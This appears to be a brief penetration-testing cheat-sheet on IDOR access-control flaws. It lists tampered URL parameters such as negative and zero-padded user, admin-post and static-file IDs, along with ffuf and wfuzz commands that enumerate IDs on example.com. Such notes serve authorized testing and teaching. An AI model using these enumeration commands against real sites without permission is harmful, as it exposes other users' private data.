IDOR (Insecure Direct Object References) Attack
IDOR is a type of access control vulnerability in web applications.
Find Vulnerabilities from HTML Source Code
First check values of attributes on input elements.
Then try what will happen when you change the Cookie value in a HTTP header.
Change GET Parameters
Manual
/user?id=1
/user?id=2
/user?id=-1
/user?id=00
/admin/posts/1
/admin/posts/-1
/admin/posts/00
/static/1.txt
/static/2.txt
/static/-1.txt
/static/00.txt
Automation
seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w -
wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ